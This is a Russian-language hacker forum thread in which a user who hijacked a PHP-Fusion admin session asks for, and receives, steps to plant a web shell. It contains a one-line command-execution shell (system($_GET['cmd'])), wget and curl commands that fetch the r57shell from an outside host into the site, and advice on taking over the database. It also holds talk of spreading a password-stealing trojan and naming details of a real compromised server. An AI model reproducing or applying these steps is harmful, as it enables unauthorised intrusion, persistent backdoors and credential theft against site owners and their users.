Сплойтом получил хеш админа, подставил в куки и имею полный доступ в php-fusion.
Подскажите как теперь можно залить скрипт пхп тот же "remview"?

рарзеши в админке приатачивать файлы и добавь расширение .php
потом создавай пост, атач шелл и жми на него =)

пробовал, запрещает запускать скрипты оттуда куда сохраняет атач

Директория, хранящая CGI приложение, доступна на запись другим пользователям. Права на директорию должны быть 0755 или 0711

English description
directory is writable by others: (/home/l/XXXXXXX.hut1.ru/WWW/forum/attachments)

Тогда иди в управление панелями - создать новую, содержание типа
system($_GET['cmd']);
включи и ок =)

спасибо ща проверю

Использовал: system('wget -o /home/l/xxxxx.hut1.ru/WWW/forum/1.php http://rst.void.ru/download/r57shell.txt');

А что это значит, вместо скрипта (http://xxxxx.hut1.ru/forum/1.php) эта муть получилась:

--18:10:05-- http://rst.void.ru:80/download/r57shell.txt => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 2) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 3) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 4) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 5) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 6) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 7) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 8) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 9) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:10) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:11) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:12) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:13) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:14) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:15) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:16) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:17) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:18) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:19) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:20) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Giving up.

Попробуй другие качалки кроме wget. Например curl.
curl --output /home/l/xxxxx.hut1.ru/WWW/forum/1.php http://rst.void.ru/download/r57shell.txt

А зачем пхп шел закачивать? Нельзя чтоли сразу вписать как
system($_GET['cmd']);

Попробуй другие качалки кроме wget. Например curl.
curl --output /home/l/xxxxx.hut1.ru/WWW/forum/1.php http://rst.void.ru/download/r57shell.txt

Нет там других закачек.

Я просто с аттачмента перенес шелл в нужну с правами папку.

Теперь встал второй вопрос - А ЧТО ДАЛЬШЕ :confused: ?

Всё грохать или дефейсить безпонту.
Что бы Вы посоветовали теперь толкового придумать что бы хоть что-то поиметь с этого?

Я уж и не знаю, может скрипт или какого трояна под видом нужной проги выложить что бы пароли с инета какие есть потырить или ещё чего.
Подло конечно это, но ради учебы и познаний на практике, компьютерный Бог возможно и простит за это:)

Где можно найти исходники желательно на дельфях троянов и прочей гадости?

Дружище дефейсить ненадо.Лучше sql клиент там заливай и входи в базу.Поучи що там и как там.Попробуй себе админом сделать через базу.Вот такие веще учи,а не сразу дефейсить.Ето будет самое тупое что можеш сделать.Успехов тебе.

Вот только чё не понятно, ты говоришь, что ты админ, а судя вот по этому --18:10:05-- http://rst.void.ru:80/download/r57shell.txt => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. мне кажется, что отказано в доступе...

Вот только чё не понятно, ты говоришь, что ты админ, а судя вот по этому --18:10:05-- http://rst.void.ru:80/download/r57shell.txt => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. мне кажется, что отказано в доступе...

не-не, админ точно, просто wget не даёт.
я взял просто шелл аттач загнал а потом перенес в нужную папку.

Мужики, теперь второй вопрос - А ЧТО ДАЛЬШЕ?

расскажите плиз, что вообще делается что бы что-то поиметь:)

есть php shell на:
Linux server.office.etersoft.ru 2.6.16-std26-up-alt6 #1 Fri May 26 19:57:37 MSD 2006 i686 GNU/Linux
Linux 2.6.16-std26-up-alt6
linux-gnu
Apache/1.3.34 (ALT Linux/alt4) mod_ssl/2.8.25 OpenSSL/0.9.7g PHP/4.4.2RC2-dev/ALT with Hardening-Patch mod_fastcgi/2.2.1
uid=96(apache) gid=96(apache) groups=62(webmaster),96(apache),500(builder)
/var/www/sites/eterhost/empl/argentum/( drwxrwsr-x )

что можно придумать?

есть php shell на:
Linux server.office.etersoft.ru 2.6.16-std26-up-alt6 #1 Fri May 26 19:57:37 MSD 2006 i686 GNU/Linux
Linux 2.6.16-std26-up-alt6
linux-gnu
Apache/1.3.34 (ALT Linux/alt4) mod_ssl/2.8.25 OpenSSL/0.9.7g PHP/4.4.2RC2-dev/ALT with Hardening-Patch mod_fastcgi/2.2.1
uid=96(apache) gid=96(apache) groups=62(webmaster),96(apache),500(builder)
/var/www/sites/eterhost/empl/argentum/( drwxrwsr-x )

что можно придумать?

Чот я форума туту не вижу etersoft.ru

Чот я форума туту не вижу etersoft.ru

на этом компе хостится и сайт с бажным форумом.
Я просто не пишу, потому что все ломанут:)
А это я как понял у них главный проект

точнее я был написал и даже ссылку дал на шелл, но Azazel отредактировал:)